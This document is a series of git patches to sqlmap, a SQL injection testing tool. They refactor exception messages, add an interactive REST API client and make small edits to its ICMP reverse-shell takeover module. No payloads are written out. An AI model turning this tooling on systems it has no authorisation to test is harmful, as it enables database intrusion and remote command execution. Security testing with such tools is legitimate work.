From 924e31c4141dcfd37cca1fba11d4febbf33a4ebc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 8 Sep 2015 11:04:36 +0200 Subject: [PATCH 01/92] Fixes #1394 --- lib/utils/api.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index 4b63fbfe6..dc88b8161 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -152,8 +152,10 @@ class Task(object): self.options = AttribDict(self._original_options) def engine_start(self): - self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)], - shell=False, close_fds=not IS_WIN) + if os.path.exists("sqlmap.py"): + self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)], shell=False, close_fds=not IS_WIN) + else: + self.process = Popen(["sqlmap", "--pickled-options", base64pickle(self.options)], shell=False, close_fds=not IS_WIN) def engine_stop(self): if self.process: From e59a22019983e01c241a85fc7414df371614c270 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 8 Sep 2015 11:10:47 +0200 Subject: [PATCH 02/92] Fixes #1393 --- lib/core/threads.py | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/core/threads.py b/lib/core/threads.py index 7a1f8d0f3..ec43ecd0d 100644 --- a/lib/core/threads.py +++ b/lib/core/threads.py @@ -10,7 +10,7 @@ import threading import time import traceback -from thread import error as threadError +from thread import error as ThreadError from lib.core.data import conf from lib.core.data import kb @@ -89,9 +89,9 @@ def exceptionHandledFunction(threadFunction): kb.threadContinue = False kb.threadException = True raise - except Exception, errMsg: + except Exception, ex: # thread is just going to be silently killed - logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) + logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) def setDaemon(thread): # Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation @@ -145,8 +145,8 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio try: thread.start() - except threadError, errMsg: - errMsg = "error occurred while starting new thread ('%s')" % errMsg + except ThreadError, ex: + errMsg = "error occurred while starting new thread ('%s')" % ex.message logger.critical(errMsg) break @@ -178,10 +178,10 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio if forwardException: raise - except (SqlmapConnectionException, SqlmapValueException), errMsg: + except (SqlmapConnectionException, SqlmapValueException), ex: print kb.threadException = True - logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) + logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) except: from lib.core.common import unhandledExceptionMessage From c1f829d1314221a10af7686b6b7a834db8560533 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 8 Sep 2015 11:15:31 +0200 Subject: [PATCH 03/92] Removing last remnants of bad handling the exceptions as strings --- lib/controller/checks.py | 8 ++++---- lib/request/httpshandler.py | 8 ++++---- 2 files changed, 8 insertions(+), 8 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index f4c053ec9..6f266702f 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1278,8 +1278,8 @@ def checkNullConnection(): infoMsg = "NULL connection is supported with 'skip-read' method" logger.info(infoMsg) - except SqlmapConnectionException, errMsg: - errMsg = getUnicode(errMsg) + except SqlmapConnectionException, ex: + errMsg = getUnicode(ex.message) raise SqlmapConnectionException(errMsg) finally: @@ -1326,7 +1326,7 @@ def checkConnection(suppressOutput=False): else: kb.errorIsNone = True - except SqlmapConnectionException, errMsg: + except SqlmapConnectionException, ex: if conf.ipv6: warnMsg = "check connection to a provided " warnMsg += "IPv6 address with a tool like ping6 " @@ -1336,7 +1336,7 @@ def checkConnection(suppressOutput=False): singleTimeWarnMessage(warnMsg) if any(code in kb.httpErrorCodes for code in (httplib.NOT_FOUND, )): - errMsg = getUnicode(errMsg) + errMsg = getUnicode(ex.message) logger.critical(errMsg) if conf.multipleTargets: diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py index 6906f4686..08e6b4193 100644 --- a/lib/request/httpshandler.py +++ b/lib/request/httpshandler.py @@ -55,9 +55,9 @@ class HTTPSConnection(httplib.HTTPSConnection): break else: sock.close() - except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg: + except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex: self._tunnel_host = None - logger.debug("SSL connection error occurred ('%s')" % errMsg) + logger.debug("SSL connection error occurred ('%s')" % ex.message) # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni @@ -75,9 +75,9 @@ class HTTPSConnection(httplib.HTTPSConnection): break else: sock.close() - except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg: + except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex: self._tunnel_host = None - logger.debug("SSL connection error occurred ('%s')" % errMsg) + logger.debug("SSL connection error occurred ('%s')" % ex.message) if not success: raise SqlmapConnectionException("can't establish SSL connection") From b6206692e08bc2c2083c55f65e8373e9dc55ce0d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 8 Sep 2015 11:53:29 +0200 Subject: [PATCH 04/92] Fixes #1392 --- lib/core/option.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/core/option.py b/lib/core/option.py index 5ebd228bd..ebef4b311 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -638,7 +638,7 @@ def _setBulkMultipleTargets(): for line in getFileItems(conf.bulkFile): if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line: found = True - kb.targets.add((line.strip(), None, None, None, None)) + kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None)) if not found and not conf.forms and not conf.crawlDepth: warnMsg = "no usable links found (with GET parameters)" From 90329a8b01ecc77677d89c4a20731e1bc0e8d0dd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 9 Sep 2015 11:53:44 +0200 Subject: [PATCH 05/92] Minor patch --- lib/core/bigarray.py | 6 +++--- lib/core/common.py | 4 ++-- lib/utils/google.py | 2 +- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py index 0e42433d8..f31b93eea 100644 --- a/lib/core/bigarray.py +++ b/lib/core/bigarray.py @@ -79,7 +79,7 @@ class BigArray(list): self.chunks[-1] = pickle.load(fp) except IOError, ex: errMsg = "exception occurred while retrieving data " - errMsg += "from a temporary file ('%s')" % ex + errMsg += "from a temporary file ('%s')" % ex.message raise SqlmapSystemException, errMsg return self.chunks[-1].pop() @@ -99,7 +99,7 @@ class BigArray(list): return filename except (OSError, IOError), ex: errMsg = "exception occurred while storing data " - errMsg += "to a temporary file ('%s'). Please " % ex + errMsg += "to a temporary file ('%s'). Please " % ex.message errMsg += "make sure that there is enough disk space left. If problem persists, " errMsg += "try to set environment variable 'TEMP' to a location " errMsg += "writeable by the current user" @@ -115,7 +115,7 @@ class BigArray(list): self.cache = Cache(index, pickle.load(fp), False) except IOError, ex: errMsg = "exception occurred while retrieving data " - errMsg += "from a temporary file ('%s')" % ex + errMsg += "from a temporary file ('%s')" % ex.message raise SqlmapSystemException, errMsg def __getstate__(self): diff --git a/lib/core/common.py b/lib/core/common.py index 556865764..5f906cd8a 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3008,7 +3008,7 @@ def createGithubIssue(errMsg, excMsg): else: warnMsg = "something went wrong while creating a Github issue" if ex: - warnMsg += " ('%s')" % ex + warnMsg += " ('%s')" % ex.message if "Unauthorized" in warnMsg: warnMsg += ". Please update to the latest revision" logger.warn(warnMsg) @@ -3567,7 +3567,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False): request = form.click() except (ValueError, TypeError), ex: errMsg = "there has been a problem while " - errMsg += "processing page forms ('%s')" % ex + errMsg += "processing page forms ('%s')" % ex.message if raise_: raise SqlmapGenericException(errMsg) else: diff --git a/lib/utils/google.py b/lib/utils/google.py index 800f366e8..7849befbb 100644 --- a/lib/utils/google.py +++ b/lib/utils/google.py @@ -50,7 +50,7 @@ class Google(object): conn = self.opener.open("http://www.google.com/ncr") conn.info() # retrieve session cookie except Exception, ex: - errMsg = "unable to connect to Google ('%s')" % ex + errMsg = "unable to connect to Google ('%s')" % ex.message raise SqlmapConnectionException(errMsg) def search(self, dork): From 72cf9041bf4f721b2ec0f72e077da66bbce9c6bf Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 9 Sep 2015 14:46:06 +0200 Subject: [PATCH 06/92] Fixes #1401 --- plugins/generic/databases.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 195b2d6a7..7c671c92e 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -805,7 +805,7 @@ class Databases: elif "." in conf.tbl: if not conf.db: - conf.db, conf.tbl = conf.tbl.split(".") + conf.db, conf.tbl = conf.tbl.split('.', 1) if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): warnMsg = "missing database parameter. sqlmap is going to " From a29a3a4e5c1a8b2e7310ed386aba5c4b0796db48 Mon Sep 17 00:00:00 2001 From: daremon Date: Wed, 9 Sep 2015 16:14:04 +0300 Subject: [PATCH 07/92] Minimal API client --- lib/utils/api.py | 73 ++++++++++++++++++++++++++++++++++++++++++------ 1 file changed, 65 insertions(+), 8 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index 4b63fbfe6..6c58b042f 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -12,6 +12,8 @@ import sqlite3 import sys import tempfile import time +import urllib2 +from pprint import pformat from lib.core.common import unArrayizeValue from lib.core.convert import base64pickle @@ -31,6 +33,7 @@ from lib.core.log import LOGGER_HANDLER from lib.core.optiondict import optDict from lib.core.settings import IS_WIN from lib.core.subprocessng import Popen +from lib.parse.cmdline import cmdLineParser from thirdparty.bottle.bottle import error as return_error from thirdparty.bottle.bottle import get from thirdparty.bottle.bottle import hook @@ -640,18 +643,72 @@ def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT): run(host=host, port=port, quiet=True, debug=False) +def _cpost(url, data=None): + logger.debug("Calling " + url) + try: + if data is not None: + data = jsonize(data) + req = urllib2.Request(url, data, {'Content-Type': 'application/json'}) + response = urllib2.urlopen(req) + text = dejsonize(response.read()) + except: + logger.error("Failed to load and parse " + url) + raise + return text + + def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): """ REST-JSON API client """ + help_message = ("Available commands:\nhelp\nnew: start a new scan\n" + "use TASKID: run task commands for this task\n" + "data, log, status: task commands\nexit") addr = "http://%s:%d" % (host, port) logger.info("Starting REST-JSON API client to '%s'..." % addr) + logger.info(help_message) - # TODO: write a simple client with requests, for now use curl from command line - logger.error("Not yet implemented, use curl from command line instead for now, for example:") - print "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid" % (host, port) - print ("\t$ curl -H \"Content-Type: application/json\" " - "-X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' " - "http://%s:%d/scan/$taskid/start") % (host, port) - print "\t$ curl http://%s:%d/scan/$taskid/data" % (host, port) - print "\t$ curl http://%s:%d/scan/$taskid/log\n" % (host, port) + taskid = '' + while True: + command = raw_input('>>> ').strip() + if command in ('data', 'log', 'status'): + if taskid == '': + logger.error("No task id in use") + continue + res = _cpost(addr + '/scan/' + taskid + '/' + command) + if not res['success']: + logger.error("Failed to execute command " + command) + logger.info(pformat(res, width=1)) + elif command == 'new': + command = raw_input('Give sqlmap parameters e.g.: -u http://testphp.vulnweb.com/artists.php?artist=1 -o\n>>> ').strip() + # new task + res = _cpost(addr + '/task/new') + if not res['success']: + logger.error("Failed to create task") + continue + taskid = res['taskid'] + logger.info('Task ID is ' + taskid) + + # start scan + original_argv = sys.argv + sys.argv = [sys.argv[0]] + command.split() + try: + d = cmdLineParser().__dict__ + except: + continue + d = {k: v for k, v in d.iteritems() if v is not None} + sys.argv = original_argv + res = _cpost(addr + '/scan/' + taskid + '/start', d) + if not res['success']: + logger.error("Failed to start scan") + continue + logger.info("Scanning started") + elif command[0:3] == 'use': + taskid = command.split()[1].strip() + logger.info("Task ID is now " + taskid) + elif command in ('exit', 'bye', 'quit'): + return + elif command in ('help', '?'): + logger.info(help_message) + else: + logger.error("Unknown command") From 263665637ed6e91da4e74e956b146dec813dd141 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 11:34:03 +0200 Subject: [PATCH 08/92] Minor bug fix --- lib/utils/api.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index dc88b8161..88a03a19c 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -554,7 +554,7 @@ def scan_log_limited(taskid, start, end): json_log_messages = list() if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_log_limited()") + logger.warning("[%s] Invalid task ID provided to scan_log_limited()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) if not start.isdigit() or not end.isdigit() or end < start: @@ -583,7 +583,7 @@ def scan_log(taskid): json_log_messages = list() if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_log()") + logger.warning("[%s] Invalid task ID provided to scan_log()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) # Read all log messages from the IPC database From 2453b02b63c9ed82681b6954a6575e1e8f3adf9d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 15:01:30 +0200 Subject: [PATCH 09/92] Update for #1402 --- lib/parse/cmdline.py | 14 +++-- lib/utils/api.py | 133 ++++++++++++++++++++++++++++--------------- 2 files changed, 97 insertions(+), 50 deletions(-) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 2ad597188..bd06c1867 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -36,14 +36,17 @@ from lib.core.shell import clearHistory from lib.core.shell import loadHistory from lib.core.shell import saveHistory -def cmdLineParser(): +def cmdLineParser(argv=None): """ This function parses the command line parameters and arguments """ + if not argv: + argv = sys.argv + checkSystemEncoding() - _ = getUnicode(os.path.basename(sys.argv[0]), encoding=sys.getfilesystemencoding()) + _ = getUnicode(os.path.basename(argv[0]), encoding=sys.getfilesystemencoding()) usage = "%s%s [options]" % ("python " if not IS_WIN else "", \ "\"%s\"" % _ if " " in _ else _) @@ -802,14 +805,15 @@ def cmdLineParser(): option = parser.get_option("-h") option.help = option.help.capitalize().replace("this help", "basic help") - argv = [] + _ = [] prompt = False advancedHelp = True extraHeaders = [] - for arg in sys.argv: - argv.append(getUnicode(arg, encoding=sys.getfilesystemencoding())) + for arg in argv: + _.append(getUnicode(arg, encoding=sys.getfilesystemencoding())) + argv = _ checkDeprecatedOptions(argv) prompt = "--sqlmap-shell" in argv diff --git a/lib/utils/api.py b/lib/utils/api.py index 2cbf7124d..ba1f02945 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -8,13 +8,15 @@ See the file 'doc/COPYING' for copying permission import logging import os +import re +import shlex import sqlite3 import sys import tempfile import time import urllib2 -from pprint import pformat +from lib.core.common import dataToStdout from lib.core.common import unArrayizeValue from lib.core.convert import base64pickle from lib.core.convert import hexencode @@ -645,16 +647,17 @@ def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT): run(host=host, port=port, quiet=True, debug=False) -def _cpost(url, data=None): +def _client(url, data=None): logger.debug("Calling " + url) try: if data is not None: data = jsonize(data) req = urllib2.Request(url, data, {'Content-Type': 'application/json'}) response = urllib2.urlopen(req) - text = dejsonize(response.read()) + text = response.read() except: - logger.error("Failed to load and parse " + url) + if data: + logger.error("Failed to load and parse " + url) raise return text @@ -663,54 +666,94 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): """ REST-JSON API client """ - help_message = ("Available commands:\nhelp\nnew: start a new scan\n" - "use TASKID: run task commands for this task\n" - "data, log, status: task commands\nexit") addr = "http://%s:%d" % (host, port) logger.info("Starting REST-JSON API client to '%s'..." % addr) - logger.info(help_message) - taskid = '' + try: + _client(addr) + except Exception, ex: + if not isinstance(ex, urllib2.HTTPError): + errMsg = "there has been a problem while connecting to the " + errMsg += "REST-JSON API server at '%s' " % addr + errMsg += "(%s)" % ex + logger.critical(errMsg) + return + + taskid = None + logger.info("Type 'help' or '?' for list of available commands") + while True: - command = raw_input('>>> ').strip() - if command in ('data', 'log', 'status'): - if taskid == '': - logger.error("No task id in use") - continue - res = _cpost(addr + '/scan/' + taskid + '/' + command) - if not res['success']: - logger.error("Failed to execute command " + command) - logger.info(pformat(res, width=1)) - elif command == 'new': - command = raw_input('Give sqlmap parameters e.g.: -u http://testphp.vulnweb.com/artists.php?artist=1 -o\n>>> ').strip() - # new task - res = _cpost(addr + '/task/new') - if not res['success']: - logger.error("Failed to create task") - continue - taskid = res['taskid'] - logger.info('Task ID is ' + taskid) + try: + command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip() + except (EOFError, KeyboardInterrupt): + print + break - # start scan - original_argv = sys.argv - sys.argv = [sys.argv[0]] + command.split() - try: - d = cmdLineParser().__dict__ - except: + if command.lower() in ("data", "log", "status"): + if not taskid: + logger.error("No task ID in use") continue - d = {k: v for k, v in d.iteritems() if v is not None} - sys.argv = original_argv - res = _cpost(addr + '/scan/' + taskid + '/start', d) - if not res['success']: + raw = _client(addr + "/scan/" + taskid + "/" + command) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command " + command) + dataToStdout("%s\n" % raw) + + elif command.lower().startswith("new"): + if ' ' not in command: + logger.error("Program arguments are missing") + continue + + argv = ["sqlmap.py"] + shlex.split(command)[1:] + + try: + d = cmdLineParser(argv).__dict__ + except: + taskid = None + continue + + d = { k: v for k, v in d.iteritems() if v is not None } + + raw = _client(addr + "/task/new") + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to create new task") + continue + taskid = res["taskid"] + logger.info("New task ID is '%s'" % taskid) + + raw = _client(addr + "/scan/" + taskid + "/start", d) + res = dejsonize(raw) + if not res["success"]: logger.error("Failed to start scan") continue logger.info("Scanning started") - elif command[0:3] == 'use': - taskid = command.split()[1].strip() - logger.info("Task ID is now " + taskid) - elif command in ('exit', 'bye', 'quit'): + + elif command.lower().startswith("use"): + taskid = (command.split()[1] if ' ' in command else "").strip("'\"") + if not taskid: + logger.error("Task ID is missing") + taskid = None + continue + elif not re.search(r"\A[0-9a-fA-F]{16}\Z", taskid): + logger.error("Invalid task ID '%s'" % taskid) + taskid = None + continue + logger.info("Switching to task ID '%s' " % taskid) + + elif command.lower() in ("exit", "bye", "quit", 'q'): return - elif command in ('help', '?'): - logger.info(help_message) - else: - logger.error("Unknown command") + + elif command.lower() in ("help", "?"): + msg = "help Show this help message\n" + msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" + msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n" + msg += "data Retrieve and show data for current task\n" + msg += "log Retrieve and show log for current task\n" + msg += "status Retrieve and show status for current task\n" + msg += "exit Exit this client\n" + + dataToStdout(msg) + + elif command: + logger.error("Unknown command '%s'" % command) From b06a34ab1a8a829ce45eb08809ec4b23be51dceb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 15:06:07 +0200 Subject: [PATCH 10/92] Another update for #1402 --- lib/utils/api.py | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index ba1f02945..caa46c188 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -647,16 +647,17 @@ def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT): run(host=host, port=port, quiet=True, debug=False) -def _client(url, data=None): +def _client(url, options=None): logger.debug("Calling " + url) try: - if data is not None: - data = jsonize(data) + data = None + if options is not None: + data = jsonize(options) req = urllib2.Request(url, data, {'Content-Type': 'application/json'}) response = urllib2.urlopen(req) text = response.read() except: - if data: + if options: logger.error("Failed to load and parse " + url) raise return text @@ -707,12 +708,12 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): argv = ["sqlmap.py"] + shlex.split(command)[1:] try: - d = cmdLineParser(argv).__dict__ + cmdLineOptions = cmdLineParser(argv).__dict__ except: taskid = None continue - d = { k: v for k, v in d.iteritems() if v is not None } + cmdLineOptions = { k: v for k, v in cmdLineOptions.iteritems() if v is not None } raw = _client(addr + "/task/new") res = dejsonize(raw) @@ -722,7 +723,7 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): taskid = res["taskid"] logger.info("New task ID is '%s'" % taskid) - raw = _client(addr + "/scan/" + taskid + "/start", d) + raw = _client(addr + "/scan/" + taskid + "/start", cmdLineOptions) res = dejsonize(raw) if not res["success"]: logger.error("Failed to start scan") From 5172999b006c31cdcf9542dd30279968ddb1ab97 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 15:09:24 +0200 Subject: [PATCH 11/92] Updating the doc/THANKS (#1402) --- doc/THANKS.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/doc/THANKS.md b/doc/THANKS.md index 931ab73bc..70fc97410 100644 --- a/doc/THANKS.md +++ b/doc/THANKS.md @@ -173,6 +173,9 @@ Ivan Giacomelli, * for suggesting a minor enhancement * for reviewing the documentation +Dimitris Giannitsaros, +* for contributing a REST-JSON API client + Nico Golde, * for reporting a couple of bugs From 00955a7eb567607d49cdd54dc3293c99aeb72f58 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 15:19:09 +0200 Subject: [PATCH 12/92] Miniscule commit --- extra/icmpsh/icmpsh_m.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py index 36fe44982..6e96952b3 100644 --- a/extra/icmpsh/icmpsh_m.py +++ b/extra/icmpsh/icmpsh_m.py @@ -76,7 +76,7 @@ def main(src, dst): # Instantiate an IP packets decoder decoder = ImpactDecoder.IPDecoder() - while 1: + while True: cmd = '' # Wait for incoming replies From 7a261ef447f0f0116608d3f27756e71598c83c2a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 15:19:33 +0200 Subject: [PATCH 13/92] Just in case commit related to the aee4c93c8b0ca9299134c65700675f8222e8a4d5 --- lib/takeover/icmpsh.py | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py index 2e5d3253c..fc742b04a 100644 --- a/lib/takeover/icmpsh.py +++ b/lib/takeover/icmpsh.py @@ -18,6 +18,7 @@ from lib.core.common import readInput from lib.core.data import conf from lib.core.data import logger from lib.core.data import paths +from lib.core.exception import SqlmapDataException class ICMPsh: """ @@ -41,6 +42,9 @@ class ICMPsh: while not address: address = readInput(message, default=self.remoteIP) + if conf.batch and not address: + raise SqlmapDataException("remote host address is missing") + return address def _selectLhost(self): @@ -53,6 +57,9 @@ class ICMPsh: while not address: address = readInput(message, default=self.localIP) + if conf.batch and not address: + raise SqlmapDataException("local host address is missing") + return address def _prepareIngredients(self, encode=True): From f494004f44fc8825f963961c7136957d8e370674 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 15:51:33 +0200 Subject: [PATCH 14/92] Switching to the getSafeExString (where it can be used) --- lib/controller/checks.py | 7 ++++--- lib/controller/controller.py | 3 ++- lib/core/common.py | 23 +++++++++++++++++++---- lib/core/dump.py | 5 +++-- lib/core/option.py | 4 ++-- lib/parse/configfile.py | 3 ++- lib/request/connect.py | 31 ++++++++++++++++--------------- lib/request/httpshandler.py | 5 +++-- lib/utils/api.py | 3 ++- lib/utils/google.py | 3 ++- lib/utils/hash.py | 3 ++- lib/utils/hashdb.py | 5 +++-- plugins/generic/entries.py | 5 +++-- sqlmap.py | 3 ++- tamper/symboliclogical.py | 2 +- 15 files changed, 66 insertions(+), 39 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 6f266702f..2cb131ad3 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -22,6 +22,7 @@ from lib.core.common import findDynamicContent from lib.core.common import Format from lib.core.common import getLastRequestHTTPError from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString from lib.core.common import getSortedInjectionTests from lib.core.common import getUnicode from lib.core.common import intersect @@ -1279,7 +1280,7 @@ def checkNullConnection(): logger.info(infoMsg) except SqlmapConnectionException, ex: - errMsg = getUnicode(ex.message) + errMsg = getSafeExString(ex) raise SqlmapConnectionException(errMsg) finally: @@ -1298,7 +1299,7 @@ def checkConnection(suppressOutput=False): raise SqlmapConnectionException(errMsg) except socket.error, ex: errMsg = "problem occurred while " - errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, ex.message) + errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex)) raise SqlmapConnectionException(errMsg) if not suppressOutput and not conf.dummy and not conf.offline: @@ -1336,7 +1337,7 @@ def checkConnection(suppressOutput=False): singleTimeWarnMessage(warnMsg) if any(code in kb.httpErrorCodes for code in (httplib.NOT_FOUND, )): - errMsg = getUnicode(ex.message) + errMsg = getSafeExString(ex) logger.critical(errMsg) if conf.multipleTargets: diff --git a/lib/controller/controller.py b/lib/controller/controller.py index d5793767c..0e82a7c23 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -24,6 +24,7 @@ from lib.core.common import dataToStdout from lib.core.common import extractRegexResult from lib.core.common import getFilteredPageContent from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite @@ -648,7 +649,7 @@ def start(): raise except SqlmapBaseException, ex: - errMsg = getUnicode(ex.message) + errMsg = getSafeExString(ex) if conf.multipleTargets: errMsg += ", skipping to the next %s" % ("form" if conf.forms else "URL") diff --git a/lib/core/common.py b/lib/core/common.py index 5f906cd8a..de7ce354c 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -879,7 +879,7 @@ def dataToOutFile(filename, data): f.write(data) except IOError, ex: errMsg = "something went wrong while trying to write " - errMsg += "to the output file ('%s')" % ex.message + errMsg += "to the output file ('%s')" % getSafeExString(ex) raise SqlmapGenericException(errMsg) return retVal @@ -3008,7 +3008,7 @@ def createGithubIssue(errMsg, excMsg): else: warnMsg = "something went wrong while creating a Github issue" if ex: - warnMsg += " ('%s')" % ex.message + warnMsg += " ('%s')" % getSafeExString(ex) if "Unauthorized" in warnMsg: warnMsg += ". Please update to the latest revision" logger.warn(warnMsg) @@ -3567,7 +3567,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False): request = form.click() except (ValueError, TypeError), ex: errMsg = "there has been a problem while " - errMsg += "processing page forms ('%s')" % ex.message + errMsg += "processing page forms ('%s')" % getSafeExString(ex) if raise_: raise SqlmapGenericException(errMsg) else: @@ -3670,7 +3670,7 @@ def evaluateCode(code, variables=None): except KeyboardInterrupt: raise except Exception, ex: - errMsg = "an error occurred while evaluating provided code ('%s') " % ex.message + errMsg = "an error occurred while evaluating provided code ('%s') " % getSafeExString(ex) raise SqlmapGenericException(errMsg) def serializeObject(object_): @@ -3977,3 +3977,18 @@ def pollProcess(process, suppress_errors=False): dataToStdout(" quit unexpectedly with return code %d\n" % returncode) break + +def getSafeExString(ex): + """ + Safe way how to get the proper exception represtation as a string + (Note: errors to be avoided: 1) "%s" % Exception(u'\u0161') and 2) "%s" % str(Exception(u'\u0161')) + """ + + retVal = ex + + if getattr(ex, "message", None): + retVal = ex.message + elif getattr(ex, "msg", None): + retVal = ex.msg + + return getUnicode(retVal) diff --git a/lib/core/dump.py b/lib/core/dump.py index 4401f1742..a4ff91913 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -15,6 +15,7 @@ import threading from lib.core.common import Backend from lib.core.common import dataToDumpFile from lib.core.common import dataToStdout +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import isListLike from lib.core.common import normalizeUnicode @@ -74,7 +75,7 @@ class Dump(object): try: self._outputFP.write(text) except IOError, ex: - errMsg = "error occurred while writing to log file ('%s')" % ex.message + errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex) raise SqlmapGenericException(errMsg) if kb.get("multiThreadMode"): @@ -94,7 +95,7 @@ class Dump(object): try: self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb") except IOError, ex: - errMsg = "error occurred while opening log file ('%s')" % ex.message + errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex) raise SqlmapGenericException(errMsg) def getOutputFile(self): diff --git a/lib/core/option.py b/lib/core/option.py index ebef4b311..e9d4331b9 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1523,7 +1523,7 @@ def _createTemporaryDirectory(): os.makedirs(tempfile.gettempdir()) except IOError, ex: errMsg = "there has been a problem while accessing " - errMsg += "system's temporary directory location(s) ('%s'). Please " % ex.message + errMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex) errMsg += "make sure that there is enough disk space left. If problem persists, " errMsg += "try to set environment variable 'TEMP' to a location " errMsg += "writeable by the current user" @@ -2071,7 +2071,7 @@ def _mergeOptions(inputOptions, 